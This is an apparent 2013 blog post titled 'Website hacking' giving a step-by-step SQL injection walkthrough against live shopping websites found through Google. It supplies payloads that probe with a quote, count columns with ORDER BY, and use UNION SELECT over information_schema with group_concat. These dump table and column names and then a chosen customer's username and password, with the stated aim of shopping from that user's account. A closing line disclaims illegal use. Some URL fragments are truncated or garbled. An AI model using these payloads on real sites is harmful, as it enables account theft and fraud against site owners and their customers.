Mar 21, 2013

Website hacking

to find a website with the url ending with
where 4383 can be any number . Now in google i have some tricks where you can actually look for some sites ending with this tag.
use these following commands in google .
Now once you get any website with this url , open that website . For demonstration i am taking a website
Step 2
Add ‘ after id=****
Now, if u are getting an error or a blank page after addition of ‘ then site is accepting sql commands from address bar of browser , which means site is vulnerable to sql injection.′
Step 3
Now next step is to find out number of vulnerable links
example – id=43434′ order by 1 –
check the number of vulnurable links by putting values 1,2,3,4 etc.. till wich the page does not gives error. order by 1 / order by 2 / etc until it comes blank
Step 4
Find out names of tables and columns union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 –
Step 5
Now what next we have to do is
replace the upper link with -17156′ union all select table_name,*,*,*,* from information_schema.tables –,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name%20from%20information_schema.tables%20–
Step 6
here group concat will give the details of all the tables in the database of the website,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28table_name%29%20from%20information_schema.tables%20%20–
Step 7
But since we are hacker :p , we are always interested in one table and that is the admin table so , look out for admin table in the list of displayed table names. Now here we chose the customer table because this is a shopping website and we want to shop from a user’s account so we will search for columns in the customer table by the following commands below,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27customer%27%20–
Step 8
same extracting information of every column of that table via group concat,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115,116,111,109,101,114%29%20–
Step 9
Now we get two column fields after executing the upper commands , that is
Now the limit fun. below will search for the username of the particular person with the id=1684
// here %20 in the url is not any command , it comes automatically once we execute our commands on the browser,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strUsername%20from%20customer%20limit%201684,1%20–
Step 10
we finally got the username of the person and now we will look for the password of that person typing the same command and replacing strPassword with strUsername.,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strPassword%20from%20customer%20limit%201684,1%20–
Finally you have the username and the password of the person of your wish , now do what ever you want to do )
NOTE : These all steps of Hacking are just meant to teach how sql Injection can be done, no illegal work should be done from the above skills.